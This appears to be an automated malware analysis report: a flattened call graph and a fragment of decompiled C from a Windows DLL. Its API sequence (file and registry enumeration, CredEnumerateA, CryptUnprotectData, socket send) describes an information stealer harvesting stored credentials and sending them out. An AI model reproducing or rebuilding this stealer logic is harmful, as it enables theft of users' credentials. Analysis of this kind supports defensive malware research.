10006a07 8615->8616 8617 10006a1a 8616->8617 8644 100068c0 8616->8644 8617->7577 8620 10001871 LocalFree 8620->8617 8622 1000675b 8621->8622 8625 10006756 8621->8625 8623 10001871 LocalFree 8622->8623 8624 100068bc 8623->8624 8624->7589 8625->8622 8626 1000677b 8625->8626 8627 1000676c 8625->8627 8629 10001db1 5 API calls 8626->8629 8628 10001db1 5 API calls 8627->8628 8630 10006779 8628->8630 8629->8630 8631 1000679f FindFirstFileA 8630->8631 8631->8622 8639 100067be 8631->8639 8632 10006849 StrStrIA 8635 1000688c FindNextFileA 8632->8635 8632->8639 8633 100067cc lstrcmpiA 8634 100067e3 lstrcmpiA 8633->8634 8633->8639 8634->8639 8636 100068a6 FindClose 8635->8636 8635->8639 8636->8622 8637 10001db1 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 8637->8639 8639->8632 8639->8633 8639->8635 8639->8637 8640 10001871 LocalFree 8639->8640 8641 10001e05 6 API calls 8639->8641 8642 1000673c 32 API calls 8639->8642 8643 10001871 LocalFree 8639->8643 8664 100066f7 8639->8664 8640->8635 8641->8639 8642->8639 8643->8639 8645 100068da 8644->8645 8646 100068df 8644->8646 8645->8646 8647 10001db1 5 API calls 8645->8647 8648 10001871 LocalFree 8646->8648 8649 100068f1 8647->8649 8650 100069f8 8648->8650 8651 10006908 FindFirstFileA 8649->8651 8650->8620 8651->8646 8656 10006927 8651->8656 8652 100069c8 FindNextFileA 8654 100069e2 FindClose 8652->8654 8652->8656 8653 10006939 lstrcmpiA 8655 10006953 lstrcmpiA 8653->8655 8653->8656 8654->8646 8655->8656 8656->8652 8656->8653 8657 10001db1 5 API calls 8656->8657 8658 10001e05 6 API calls 8656->8658 8657->8656 8659 10006995 StrStrIA 8658->8659 8660 100069b0 8659->8660 8661 100069c3 8659->8661 8662 1000673c 38 API calls 8660->8662 8663 10001871 LocalFree 8661->8663 8662->8661 8663->8652 8665 10004137 16 API calls 8664->8665 8666 10006705 8665->8666 8668 1000672c 8666->8668 8669 100064b3 8666->8669 8668->8639 8671 100064c2 8669->8671 8670 100064cb 8670->8668 8671->8670 8672 10006595 8671->8672 8684 10006343 8671->8684 8674 100065a7 
8672->8674 8675 10006343 7 API calls 8672->8675 8674->8668 8683 100065c3 8675->8683 8676 100065c9 8676->8668 8677 10006201 LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 8677->8683 8678 10006667 StrStrIA 8679 10006678 StrStrIA 8678->8679 8678->8683 8681 10006689 StrStrIA 8679->8681 8679->8683 8680 10001871 LocalFree 8680->8683 8681->8683 8682 10001584 lstrlenA 8682->8683 8683->8676 8683->8677 8683->8678 8683->8680 8683->8682 8686 10006358 8684->8686 8685 10006372 8685->8672 8686->8685 8688 10006398 StrStrIA 8686->8688 8691 10001871 LocalFree 8686->8691 8692 10001584 lstrlenA 8686->8692 8693 10006282 8686->8693 8697 100062ff 8686->8697 8688->8686 8689 100063a9 StrStrIA 8688->8689 8689->8686 8691->8686 8692->8686 8695 1000628b 8693->8695 8705 10006201 8695->8705 8696 100062b7 8696->8686 8698 1000630f 8697->8698 8699 10006201 4 API calls 8698->8699 8700 1000631a 8699->8700 8701 10006201 4 API calls 8700->8701 8702 1000632a 8701->8702 8703 10006201 4 API calls 8702->8703 8704 1000633a 8703->8704 8704->8686 8706 10006216 8705->8706 8707 1000626f 8706->8707 8717 10005fe2 8706->8717 8707->8696 8710 10005fe2 2 API calls 8711 10006249 8710->8711 8723 1000606e 8711->8723 8713 1000625d 8714 10001871 LocalFree 8713->8714 8715 10006267 8714->8715 8716 10001871 LocalFree 8715->8716 8716->8707 8718 10005ff3 8717->8718 8720 10006034 8718->8720 8745 10001888 LocalAlloc 8718->8745 8720->8710 8721 10006015 8721->8720 8722 10001871 LocalFree 8721->8722 8722->8720 8724 1000608f 8723->8724 8725 1000607d 8723->8725 8724->8713 8725->8724 8746 10001888 LocalAlloc 8725->8746 8727 100060de 8747 10002452 8727->8747 8745->8721 8746->8727 8748 10001888 LocalAlloc 8747->8748 8755 10004aa3 8754->8755 8758 10004a9e 8754->8758 8756 10001871 LocalFree 8755->8756 8757 10004c0c 8756->8757 8757->7633 8758->8755 8759 10004ac3 8758->8759 8760 10004ab4 8758->8760 8762 10001db1 5 API calls 8759->8762 8761 10001db1 5 API calls 8760->8761 8763 10004ac1 8761->8763 8762->8763 8764 10004ae7 
FindFirstFileA 8763->8764 8764->8755 8774 10004b06 8764->8774 8765 10004b14 lstrcmpiA 8768 10004b2b lstrcmpiA 8765->8768 8776 10004b26 8765->8776 8766 10004b79 StrStrIA 8767 10004bdc FindNextFileA 8766->8767 8766->8774 8770 10004bf6 FindClose 8767->8770 8767->8774 8768->8776 8769 10001db1 5 API calls 8769->8774 8770->8755 8771 10001db1 5 API calls 8771->8776 8772 10001e05 6 API calls 8772->8774 8773 10001e05 6 API calls 8773->8776 8774->8765 8774->8766 8774->8769 8774->8772 8775 10004bb7 StrStrIA 8774->8775 8778 10004bce 8774->8778 8775->8774 8776->8767 8776->8771 8776->8773 8777 10004a84 24 API calls 8776->8777 8781 10001871 LocalFree 8776->8781 8777->8776 8780 10001871 LocalFree 8778->8780 8793 10004a6d 8778->8793 8780->8767 8781->8776 8783 10001e6a 7 API calls 8782->8783 8784 10004c25 8783->8784 8785 10001db1 5 API calls 8784->8785 8791 10004c40 8784->8791 8787 10004c37 8785->8787 8786 10004a84 31 API calls 8788 10004c50 8786->8788 8789 10001871 LocalFree 8787->8789 8790 10001871 LocalFree 8788->8790 8789->8791 8792 10004c58 8790->8792 8791->8786 8792->7628 8794 10004064 16 API calls 8793->8794 8795 10004a80 8794->8795 8795->8778 8797 1000a656 8796->8797 8807 1000a36f 8796->8807 8797->7640 8798 1000a376 RegEnumKeyExA 8799 1000a39f RegCloseKey 8798->8799 8798->8807 8799->8797 8801 10001db1 5 API calls 8801->8807 8802 10001e05 6 API calls 8802->8807 8803 10001d2a 6 API calls 8803->8807 8804 1000a34f 15 API calls 8804->8807 8805 10001584 lstrlenA 8805->8807 8806 10001871 LocalFree 8806->8807 8807->8798 8807->8801 8807->8802 8807->8803 8807->8804 8807->8805 8807->8806 8809 10005f95 8808->8809 8818 10005d53 8808->8818 8809->7646 8810 10005d5a RegEnumKeyExA 8811 10005d83 RegCloseKey 8810->8811 8810->8818 8811->8809 8813 10001db1 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 8813->8818 8814 10001d2a 6 API calls 8814->8818 8815 10001871 LocalFree 8815->8818 8816 10005d33 11 API calls 8816->8818 8817 10001584 lstrlenA 8817->8818 8818->8810 8818->8813 8818->8814 
8818->8815 8818->8816 8818->8817 8820 1000acb0 8819->8820 8821 1000ac96 8819->8821 8823 1000a89e RegOpenKeyA 8820->8823 8821->8820 8843 10007b11 8821->8843 8824 1000a93e 8823->8824 8831 1000a8be 8823->8831 8824->7670 8825 1000a8c5 RegEnumKeyExA 8826 1000a8ee RegCloseKey 8825->8826 8825->8831 8826->8824 8828 10001db1 5 API calls 8828->8831 8829 10001e05 6 API calls 8829->8831 8831->8825 8831->8828 8831->8829 8832 10001871 LocalFree 8831->8832 8856 1000a709 8831->8856 8832->8831 8834 1000a9eb 8833->8834 8840 1000a962 8833->8840 8834->7674 8835 1000a969 RegEnumKeyExA 8836 1000a992 RegCloseKey 8835->8836 8835->8840 8836->8834 8838 10001db1 5 API calls 8838->8840 8839 10001e05 6 API calls 8839->8840 8840->8835 8840->8838 8840->8839 8841 1000a89e 23 API calls 8840->8841 8842 10001871 LocalFree 8840->8842 8841->8840 8842->8840 8846 10007b31 8843->8846 8844 10007b86 8844->8820 8846->8844 8847 10007a7b 8846->8847 8849 10007a9e 8847->8849 8848 10007afb 8848->8846 8849->8848 8851 100079f5 8849->8851 8852 10007a02 8851->8852 8853 10007a07 8851->8853 8852->8849 8854 10007a6b 8853->8854 8855 10007a5a CoTaskMemFree 8853->8855 8854->8849 8855->8853 8858 1000a719 8856->8858 8857 10001d2a 6 API calls 8857->8858 8858->8857 8860 1000a755 8858->8860 8861 10001871 LocalFree 8858->8861 8875 1000a6bf 8858->8875 8862 10001d2a 6 API calls 8860->8862 8863 10001584 lstrlenA 8860->8863 8865 10001871 LocalFree 8860->8865 8868 1000a7ac 8860->8868 8861->8858 8862->8860 8863->8860 8864 10001d2a 6 API calls 8864->8868 8865->8860 8866 10001871 LocalFree 8866->8868 8867 1000a6bf 6 API calls 8867->8868 8868->8864 8868->8866 8868->8867 8873 1000a82d 8868->8873 8884 100043d4 8868->8884 8869 10001d2a 6 API calls 8869->8873 8871 1000a884 8871->8831 8872 10001584 lstrlenA 8872->8873 8873->8869 8873->8871 8873->8872 8874 10001871 LocalFree 8873->8874 8874->8873 8890 10002a94 8875->8890 8877 1000a700 8877->8858 8878 1000a6d0 8878->8877 8879 10001584 lstrlenA 8878->8879 8880 1000a6ed 8879->8880 8881 10001584 
lstrlenA 8880->8881 8882 1000a6f8 8881->8882 8883 10001871 LocalFree 8882->8883 8883->8877 8885 10004459 8884->8885 8886 100043fd 8884->8886 8885->8868 8886->8885 8887 1000441a CryptUnprotectData 8886->8887 8887->8885 8889 1000442a 8887->8889 8888 10004451 LocalFree 8888->8885 8889->8885 8889->8888 8891 10002aa3 8890->8891 8892 10002a9d 8890->8892 8891->8878 8892->8891 8893 10002aa9 IsTextUnicode 8892->8893 8894 10002aca 8893->8894 8895 10002aba 8893->8895 8899 10001888 LocalAlloc 8894->8899 8896 10002a17 4 API calls 8895->8896 8898 10002ac8 8896->8898 8898->8878 8899->8898 8901 10001e6a 7 API calls 8900->8901 8902 10005836 8901->8902 8903 10005854 8902->8903 8904 10001e05 6 API calls 8902->8904 8903->7728 8905 10005845 8904->8905 8906 100057fa 34 API calls 8905->8906 8907 1000584f 8906->8907 8908 10001871 LocalFree 8907->8908 8908->8903 8910 10004349 34 API calls 8909->8910 8911 10005812 8910->8911 8912 10004349 34 API calls 8911->8912 8913 10005827 8912->8913 8913->7715 8915 10001e6a 7 API calls 8914->8915 8916 10005981 8915->8916 8917 100059d3 8916->8917 8918 10001e05 6 API calls 8916->8918 8917->7744 8919 10005990 8918->8919 8920 10004349 34 API calls 8919->8920 8921 100059a6 8920->8921 8922 10004349 34 API calls 8921->8922 8923 100059ba 8922->8923 8924 10004349 34 API calls 8923->8924 8925 100059ce 8924->8925 8926 10001871 LocalFree 8925->8926 8926->8917 8928 10001e6a 7 API calls 8927->8928 8929 10004f39 8928->8929 8930 10004fd0 8929->8930 8931 10001db1 5 API calls 8929->8931 8930->7763 8932 10004f51 8931->8932 8933 10004df4 29 API calls 8932->8933 8934 10004f60 8933->8934 8935 10001871 LocalFree 8934->8935 8936 10004f65 8935->8936 8937 10001db1 5 API calls 8936->8937 8938 10004f72 8937->8938 8939 10004df4 29 API calls 8938->8939 8940 10004f81 8939->8940 8941 10001871 LocalFree 8940->8941 8942 10004f86 8941->8942 8943 10001db1 5 API calls 8942->8943 8944 10004f93 8943->8944 8945 10004df4 29 API calls 8944->8945 8946 10004fa2 8945->8946 8947 10001871 LocalFree 
8946->8947 8948 10004fa7 8947->8948 8949 10001db1 5 API calls 8948->8949 8950 10004fb4 8949->8950 8951 10004df4 29 API calls 8950->8951 8952 10004fc3 8951->8952 8953 10001871 LocalFree 8952->8953 8954 10004fc8 8953->8954 8955 10001871 LocalFree 8954->8955 8955->8930 8957 10001d2a 6 API calls 8956->8957 8959 10004dce 8957->8959 8958 10004df0 8958->7773 8959->8958 8960 10001871 LocalFree 8959->8960 8960->8958 8962 10004e13 8961->8962 8963 10004e0e 8961->8963 8965 10001871 LocalFree 8962->8965 8963->8962 8964 10001db1 5 API calls 8963->8964 8966 10004e23 8964->8966 8967 10004f27 8965->8967 8985 10004d93 8966->8985 8967->7759 8970 10001871 LocalFree 8971 10004e32 8970->8971 8972 10001db1 5 API calls 8971->8972 8973 10004e3f 8972->8973 8974 10004e56 FindFirstFileA 8973->8974 8974->8962 8975 10004e75 8974->8975 8976 10004e83 lstrcmpiA 8975->8976 8977 10004ef7 FindNextFileA 8975->8977 8979 10004e9d lstrcmpiA 8976->8979 8983 10004e9b 8976->8983 8977->8975 8978 10004f11 FindClose 8977->8978 8978->8962 8979->8983 8980 10001db1 5 API calls 8980->8983 8981 10001e05 6 API calls 8981->8983 8982 10004d93 16 API calls 8982->8983 8983->8977 8983->8980 8983->8981 8983->8982 8984 10001871 LocalFree 8983->8984 8984->8977 8986 10004064 16 API calls 8985->8986 8987 10004da6 8986->8987 8987->8970 8989 10009cd9 8988->8989 8990 10009c5d 8988->8990 8989->7789 8990->8989 8991 10009c6f CredEnumerateA 8990->8991 8991->8989 8992 10009c96 8991->8992 8992->8989 8993 10009cd0 CredFree 8992->8993 8995 10009b9c 8992->8995 8993->8989 8996 10009baf 8995->8996 8997 10001584 lstrlenA 8996->8997 8998 10009bba 8997->8998 8999 10001584 lstrlenA 8998->8999 9000 10009bc5 8999->9000 9001 10009bd3 StrStrIA 9000->9001 9002 10009be4 lstrlenA StrStrIA 9001->9002 9007 10009c30 9001->9007 9003 10009c02 9002->9003 9004 100038e3 2 API calls 9003->9004 9005 10009c10 9004->9005 9006 10001584 lstrlenA 9005->9006 9005->9007 9006->9007 9007->8992 9008->7798 9010 10004849 9009->9010 9012 10004727 9009->9012 9010->7804 9011 
10004740 9014 10001d2a 6 API calls 9011->9014 9012->9011 9013 10001e05 6 API calls 9012->9013 9013->9011 9015 1000475a 9014->9015 9016 1000477c 9015->9016 9017 10001db1 5 API calls 9015->9017 9018 10001d2a 6 API calls 9016->9018 9019 10004768 9017->9019 9020 10004792 9018->9020 9021 10004703 16 API calls 9019->9021 9022 100047b4 9020->9022 9025 10001db1 5 API calls 9020->9025 9023 10004772 9021->9023 9024 10001d2a 6 API calls 9022->9024 9026 10001871 LocalFree 9023->9026 9027 100047cb 9024->9027 9028 100047a0 9025->9028 9029 10004777 9026->9029 9030 100047ed 9027->9030 9033 10001db1 5 API calls 9027->9033 9031 10004703 16 API calls 9028->9031 9032 10001871 LocalFree 9029->9032 9034 10001d2a 6 API calls 9030->9034 9035 100047aa 9031->9035 9032->9016 9036 100047d9 9033->9036 9037 10004803 9034->9037 9038 10001871 LocalFree 9035->9038 9041 10004703 16 API calls 9036->9041 9039 10004825 9037->9039 9042 10001db1 5 API calls 9037->9042 9040 100047af 9038->9040 9044 10001db1 5 API calls 9039->9044 9043 10001871 LocalFree 9040->9043 9045 100047e3 9041->9045 9046 10004811 9042->9046 9043->9022 9047 10004832 9044->9047 9048 10001871 LocalFree 9045->9048 9049 10004703 16 API calls 9046->9049 9050 10004703 16 API calls 9047->9050 9051 100047e8 9048->9051 9052 1000481b 9049->9052 9053 1000483c 9050->9053 9054 10001871 LocalFree 9051->9054 9055 10001871 LocalFree 9052->9055 9056 10001871 LocalFree 9053->9056 9054->9030 9057 10004820 9055->9057 9058 10004841 9056->9058 9059 10001871 LocalFree 9057->9059 9060 10001871 LocalFree 9058->9060 9059->9039 9060->9010 9062 10004064 16 API calls 9061->9062 9063 10004716 9062->9063 9063->7839 9065 10001d2a 6 API calls 9064->9065 9066 100050fc 9065->9066 9067 1000515c 9066->9067 9068 10001db1 5 API calls 9066->9068 9067->7871 9069 10005110 9068->9069 9092 100050c3 9069->9092 9072 10001db1 5 API calls 9073 1000512b 9072->9073 9074 100050c3 16 API calls 9073->9074 9075 10005139 9074->9075 9076 10001db1 5 API calls 9075->9076 9077 10005146 
9076->9077 9078 100050c3 16 API calls 9077->9078 9079 10005154 9078->9079 9080 10001871 LocalFree 9079->9080 9080->9067 9082 10001e6a 7 API calls 9081->9082 9083 100051b9 9082->9083 9084 10005207 9083->9084 9098 10005160 9083->9098 9084->7903 9093 100050e2 9092->9093 9094 100050cc 9092->9094 9093->9072 9095 10004064 16 API calls 9094->9095 9096 100050da 9095->9096 9097 10001871 LocalFree 9096->9097 9097->9093 9099 10001db1 5 API calls 9098->9099 9100 10005170 9099->9100 9156 1000547e 9111->9156 9114 1000547e 7 API calls 9115 10005643 9114->9115 9116 1000547e 7 API calls 9115->9116 9117 10005671 RegOpenKeyA 9116->9117 9118 10005701 9117->9118 9123 10005687 9117->9123 9118->7911 9119 1000568e RegEnumKeyExA 9120 100056b7 RegCloseKey 9119->9120 9119->9123 9120->9118 9122 10001db1 5 API calls 9122->9123 9123->9119 9123->9122 9124 10001e05 6 API calls 9123->9124 9125 100055de 15 API calls 9123->9125 9126 10001871 LocalFree 9123->9126 9124->9123 9125->9123 9126->9123 9137 100053ea 9136->9137 9138 1000544d 9136->9138 9139 10001db1 5 API calls 9137->9139 9138->7918 9140 100053f7 9139->9140 9141 10004064 16 API calls 9140->9141 9157 10001d2a 6 API calls 9156->9157 9158 10005497 9157->9158 9159 10001d2a 6 API calls 9158->9159 9160 100054ad 9159->9160 9161 10001d2a 6 API calls 9160->9161 9162 100054c3 9161->9162 9163 10001d2a 6 API calls 9162->9163 9164 100054db 9163->9164 9165 10001d2a 6 API calls 9164->9165 9166 100054f1 9165->9166 9167 10001d2a 6 API calls 9166->9167 9169 10005509 9167->9169 9168 10001871 LocalFree 9170 100055b2 9168->9170 9174 10001584 lstrlenA 9169->9174 9190 10005585 9169->9190 9171 10001871 LocalFree 9170->9171 9172 100055ba 9171->9172 9173 10001871 LocalFree 9172->9173 9175 100055c2 9173->9175 9176 10005540 9174->9176 9177 10001871 LocalFree 9175->9177 9178 10001584 lstrlenA 9176->9178 9179 100055ca 9177->9179 9180 1000554b 9178->9180 9181 10001871 LocalFree 9179->9181 9182 10001584 lstrlenA 9180->9182 9183 100055d2 9181->9183 9184 10005556 9182->9184 
9185 10001871 LocalFree 9183->9185 9186 10001584 lstrlenA 9184->9186 9188 1000556a 9184->9188 9187 100055da 9185->9187 9186->9188 9187->9114 9189 10001584 lstrlenA 9188->9189 9189->9190 9190->9168 9194 100080b7 9191->9194 9196 1000800d 9191->9196 9192 10007e6c 17 API calls 9193 100080dc 9192->9193 9200 100080e0 9193->9200 9194->9192 9195 1000806f StrStrIW 9195->9196 9196->9194 9196->9195 9213 10007e6c lstrlenW 9196->9213 9198 1000809f CoTaskMemFree 9198->9196 9199 100080ad CoTaskMemFree 9198->9199 9199->9196 9202 100080f0 9200->9202 9201 10008216 9209 1000821b 9201->9209 9202->9201 9203 10008135 CredEnumerateA 9202->9203 9203->9201 9206 10008160 9203->9206 9204 1000820d CredFree 9204->9201 9205 1000817c lstrlenW CryptUnprotectData 9205->9206 9206->9201 9206->9204 9206->9205 9207 100081ef LocalFree 9206->9207 9241 10007bd5 9206->9241 9207->9206 9210 1000822e 9209->9210 9211 1000832b 9209->9211 9210->9211 9245 10007c54 9210->9245 9211->7950 9214 10007e7f 9213->9214 9215 10007e84 9213->9215 9214->9198 9216 10007ee0 wsprintfA 9215->9216 9217 10007eb4 wsprintfA 9215->9217 9219 10001e05 6 API calls 9216->9219 9218 10001e05 6 API calls 9217->9218 9218->9215 9220 10007f07 9219->9220 9221 10001d2a 6 API calls 9220->9221 9222 10007f21 9221->9222 9223 10007f3c 9222->9223 9224 10001d2a 6 API calls 9222->9224 9225 10007fdb 9223->9225 9227 10007f51 lstrlenW 9223->9227 9228 10007fd3 9223->9228 9224->9223 9226 10001871 LocalFree 9225->9226 9229 10007fe3 9226->9229 9227->9228 9230 10007f83 CryptUnprotectData 9227->9230 9231 10001871 LocalFree 9228->9231 9229->9198 9230->9228 9232 10007fa1 9230->9232 9231->9225 9232->9228 9235 10007b9c 9232->9235 9234 10007fcb LocalFree 9234->9228 9239 10001522 9235->9239 9237 10007baa lstrlenW 9238 10007bc3 9237->9238 9238->9234 9240 10001533 9239->9240 9240->9237 9242 10001522 9241->9242 9243 10007be3 lstrlenA 9242->9243 9244 10007bf8 9243->9244 9244->9207 9246 10001522 9245->9246 9247 10007c62 lstrlenW 9246->9247 9248 10001558 9247->9248 9249 
10007c7b lstrlenW 9248->9249 9250 10001558 9249->9250 9251 10007c94 lstrlenW 9250->9251 9252 10007cad 9251->9252 9252->9210 9254 10005c7d 9253->9254 9261 10005a43 9253->9261 9254->7954 9255 10005a4a RegEnumKeyExA 9256 10005a73 RegCloseKey 9255->9256 9255->9261 9256->9254 9258 10001db1 5 API calls 9258->9261 9259 10001e05 6 API calls 9259->9261 9260 10001d2a 6 API calls 9260->9261 9261->9255 9261->9258 9261->9259 9261->9260 9262 10001871 LocalFree 9261->9262 9263 10001584 lstrlenA 9261->9263 9262->9261 9263->9261 9309 10001016 CreateStreamOnHGlobal 9343 1000b1de 9350 10001741 GetHGlobalFromStream 9343->9350 9345 1000b1e9 9346 100027d0 18 API calls 9345->9346 9349 1000b1fe 9346->9349 9347 1000b224 9348 10001871 LocalFree 9348->9347 9349->9347 9349->9348 9351 10001782 9350->9351 9352 10001757 9350->9352 9351->9345 9353 1000175f GlobalLock 9352->9353 9353->9351 9354 1000176e 9353->9354 9355 10002452 2 API calls 9354->9355 9356 1000177a GlobalUnlock 9355->9356 9356->9351 6793 1000b362 6803 10003ff3 WSAStartup 6793->6803 6795 1000b369 6796 1000b44d 6795->6796 6797 1000b439 6795->6797 6800 1000b418 Sleep 6795->6800 6802 1000b0dd 6 API calls 6795->6802 6804 10003f8f 6795->6804 6838 10001b79 GetHGlobalFromStream 6795->6838 6797->6796 6813 100026b6 RegCreateKeyA 6797->6813 6800->6795 6802->6795 6803->6795 6805 10003f9e 6804->6805 6808 10003fe4 6804->6808 6806 10003fa4 GetHGlobalFromStream 6805->6806 6805->6808 6807 10003fb4 6806->6807 6806->6808 6809 10003fbc GlobalLock 6807->6809 6808->6795 6809->6808 6810 10003fcb 6809->6810 6848 10003f35 6810->6848 6814 100026da RegSetValueExA 6813->6814 6815 100026fc 6813->6815 6816 100026f3 6814->6816 6817 100026f4 RegCloseKey 6814->6817 6818 10002704 GetTempPathA 6815->6818 6819 100027c9 6815->6819 6816->6817 6817->6815 6818->6819 6820 1000271d 6818->6820 6819->6796 6820->6819 6821 10002728 CreateDirectoryA 6820->6821 6822 10002742 6821->6822 6823 10002762 6822->6823 6824 10002746 6822->6824 6825 10001db1 5 API calls 6823->6825 6950 
10001db1 6824->6950 6827 10002771 CreateFileA 6825->6827 6829 10002797 6827->6829 6830 100027af 6827->6830 6828 10002757 6955 10001e05 6828->6955 6963 1000145e 6829->6963 6833 100027b3 DeleteFileA 6830->6833 6834 100027be 6830->6834 6833->6834 6837 10001871 LocalFree 6834->6837 6837->6819 6839 10001c37 6838->6839 6840 10001b99 6838->6840 6839->6795 6840->6839 6841 10001bae GlobalLock 6840->6841 6841->6839 6842 10001bba 6841->6842 6969 10001888 LocalAlloc 6842->6969 6844 10001bc5 6845 10001bd6 GlobalUnlock 6844->6845 6846 10001bef 6845->6846 6847 10001871 LocalFree 6846->6847 6847->6839 6849 10003f44 6848->6849 6856 10003d48 6849->6856 6852 10003d48 27 API calls 6853 10003f7f 6852->6853 6854 10001871 LocalFree 6853->6854 6855 10003f88 GlobalUnlock 6854->6855 6855->6808 6893 10001888 LocalAlloc 6856->6893 6858 10003d5c 6894 10001888 LocalAlloc 6858->6894 6860 10003d69 6895 10001888 LocalAlloc 6860->6895 6862 10003d76 6896 10001888 LocalAlloc 6862->6896 6864 10003d83 InternetCrackUrlA 6865 10003dd1 6864->6865 6883 10003dd7 6864->6883 6866 10003ddc InternetCreateUrlA 6865->6866 6865->6883 6867 10003e01 InternetCrackUrlA 6866->6867 6866->6883 6870 10003e42 6867->6870 6867->6883 6868 10001871 LocalFree 6869 10003f15 6868->6869 6871 10001871 LocalFree 6869->6871 6872 10003e4d ObtainUserAgentString 6870->6872 6870->6883 6873 10003f1d 6871->6873 6874 10003e7d wsprintfA 6872->6874 6875 10003e5f wsprintfA 6872->6875 6876 10001871 LocalFree 6873->6876 6877 10003e9b 6874->6877 6875->6877 6878 10003f25 6876->6878 6897 1000391d socket 6877->6897 6880 10001871 LocalFree 6878->6880 6882 10003f2d 6880->6882 6882->6852 6882->6855 6883->6868 6885 10003ebb lstrlenA 6906 100039a1 6885->6906 6887 10003ecf 6888 10003ed3 6887->6888 6890 10003ee9 6887->6890 6891 100039a1 send 6887->6891 6889 10003f05 closesocket 6888->6889 6889->6883 6890->6888 6890->6889 6911 10003b95 6890->6911 6891->6890 6893->6858 6894->6860 6895->6862 6896->6864 6898 10003936 6897->6898 6900 10003938 6897->6900 
6898->6883 6905 10003d1a setsockopt 6898->6905 6899 1000395a 6901 1000397e connect 6899->6901 6902 1000396b 6899->6902 6900->6899 6900->6902 6928 100038e3 inet_addr 6900->6928 6901->6898 6904 10003992 closesocket 6901->6904 6902->6904 6904->6898 6905->6885 6907 100039b7 6906->6907 6908 100039ac 6906->6908 6909 100039bf send 6907->6909 6910 100039dc 6907->6910 6908->6887 6909->6907 6909->6910 6910->6887 6931 10001888 LocalAlloc 6911->6931 6914 10003ba7 6917 10003bef 6914->6917 6927 10003bde 6914->6927 6932 10003a4d 6914->6932 6915 10001871 LocalFree 6916 10003d12 6915->6916 6916->6888 6918 10003c0c StrStrIA 6917->6918 6919 10003c25 lstrlenA StrToIntA 6918->6919 6920 10003c5b StrStrIA 6918->6920 6919->6920 6921 10003c6e lstrlenA 6920->6921 6924 10003ca2 6920->6924 6944 100029f6 lstrlenA 6921->6944 6923 10003c9b 6923->6924 6938 10003abf 6924->6938 6927->6915 6929 100038f3 gethostbyname 6928->6929 6930 100038ff 6928->6930 6929->6930 6930->6899 6931->6914 6947 100039ed select 6932->6947 6934 10003a60 6935 100039ed select 6934->6935 6936 10003a72 6934->6936 6937 10003a74 recv 6934->6937 6935->6934 6936->6914 6937->6934 6937->6936 6939 100039ed select 6938->6939 6941 10003ad5 6939->6941 6940 100039ed select 6940->6941 6941->6940 6942 10003afc recv 6941->6942 6943 10003ae7 6941->6943 6942->6941 6942->6943 6943->6927 6949 10001888 LocalAlloc 6944->6949 6946 10002a08 lstrcpyA 6946->6923 6948 10003a3c 6947->6948 6948->6934 6949->6946 6951 10001dbb lstrlenA lstrlenA 6950->6951 6967 10001888 LocalAlloc 6951->6967 6954 10001dea lstrcpyA lstrcatA 6954->6828 6957 10001e0f lstrlenA lstrlenA 6955->6957 6968 10001888 LocalAlloc 6957->6968 6959 10001e3e lstrcpyA lstrcatA 6960 10001e63 6959->6960 6961 10001e5b 6959->6961 6960->6827 6962 10001871 LocalFree 6961->6962 6962->6960 6964 10001468 WriteFile 6963->6964 6965 1000147e 6964->6965 6966 10001484 CloseHandle 6964->6966 6965->6964 6965->6966 6966->6830 6967->6954 6968->6959 6969->6844 6970 1000b763 OleInitialize 6986 100024eb 
6970->6986 6972 1000b76f 7008 10002bdf 6972->7008 6974 1000b77e 6975 1000b782 6974->6975 6976 1000b798 6974->6976 7055 10002cca 6975->7055 7026 10001888 LocalAlloc 6976->7026 6979 1000b78a 6979->6976 6980 1000b7a2 GetUserNameA 6981 1000b7c1 6980->6981 6982 1000b7cc 6980->6982 6984 10001871 LocalFree 6981->6984 7027 10002074 6982->7027 6984->6982 6985 1000b7db 6987 100024f5 6986->6987 7074 10002491 LoadLibraryA 6987->7074 6989 100024fa 6990 10002491 2 API calls 6989->6990 6991 10002509 6990->6991 6992 10002491 2 API calls 6991->6992 6993 10002518 6992->6993 6994 10002491 2 API calls 6993->6994 6995 10002527 6994->6995 6996 10002491 2 API calls 6995->6996 6997 10002536 6996->6997 6998 10002491 2 API calls 6997->6998 6999 10002545 6998->6999 7000 10002491 2 API calls 6999->7000 7001 10002554 7000->7001 7002 10002491 2 API calls 7001->7002 7003 10002563 7002->7003 7004 10002491 2 API calls 7003->7004 7005 10002572 7004->7005 7006 10002491 2 API calls 7005->7006 7007 10002581 7006->7007 7007->6972 7009 10002bf6 7008->7009 7010 10002bf8 7008->7010 7009->6974 7011 10002c14 7010->7011 7012 10002c19 GetCurrentProcess OpenProcessToken 7010->7012 7011->6974 7013 10002cc5 7012->7013 7014 10002c35 GetTokenInformation 7012->7014 7013->6974 7015 10002c53 GetLastError 7014->7015 7016 10002cbd CloseHandle 7014->7016 7015->7016 7017 10002c5d 7015->7017 7016->7013 7017->7016 7080 10001888 LocalAlloc 7017->7080 7019 10002c6b GetTokenInformation 7020 10002cb5 7019->7020 7021 10002c87 ConvertSidToStringSidA 7019->7021 7022 10001871 LocalFree 7020->7022 7021->7020 7023 10002c9b lstrcmpA 7021->7023 7022->7016 7024 10002cac 7023->7024 7025 10002cad LocalFree 7023->7025 7024->7025 7025->7020 7026->6980 7028 10002088 7027->7028 7029 10002093 7027->7029 7030 10001871 LocalFree 7028->7030 7031 10001871 LocalFree 7029->7031 7032 100020b1 7029->7032 7030->7029 7031->7032 7033 100020d3 RegOpenKeyA 7032->7033 7037 10002249 7033->7037 7044 100020ee 7033->7044 7034 100020f8 RegEnumKeyExA 7035 

Executed Functions

Control-flow Graph
C-Code - Quality: 94%
			E10007241(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t58;
				signed int _t60;
				CHAR* _t62;
				void* _t66;
				char* _t69;
				int _t71;
				char* _t72;
				char* _t76;
				int _t83;
				int _t85;
				int _t88;
				signed int _t90;
				void* _t92;
				char* _t105;
				signed int _t111;
				signed int* _t112;
				signed int _t113;

				_t111 = __ecx;
				_v332 = 0;
				_t58 = _a16;
				if(_t58 == 0 ||  *_t58 == 0) {
					L33:
					return E10001871(_v332);
				} else {
					_t60 = E10002582(_a16);
					__eflags = _t60;
					if(_t60 != 0) {
						_t62 = E10001DB1(_a16, "*.*");
					} else {
						_t62 = E10001DB1(_a16, "\*.*");
					}
					_v332 = _t62;
					E1000189F( &_v324, 0x13e);
